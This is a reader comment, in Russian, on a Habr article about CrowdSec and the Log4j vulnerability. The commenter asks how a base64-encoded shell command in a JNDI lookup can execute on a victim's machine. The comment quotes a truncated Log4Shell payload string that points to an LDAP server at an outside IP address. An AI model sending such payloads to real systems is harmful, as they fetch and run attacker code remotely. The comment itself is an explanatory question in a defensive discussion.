Как CrowdSec помогает справиться с уязвимостью в Log4j / Comments / Habr

iliks84 Mar 31 2023 at 10:06

Не понял, как шел-скрипт в base64 может исполниться на компьютере жертвы. Одно дело когда в урле стоит адрес, возвращающий java-класс, она его загружает и выполняет - но неужели есть и такая форма jndi-лукапа, когда джава выполнит команду шелла заданную в урле?

"${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1c..."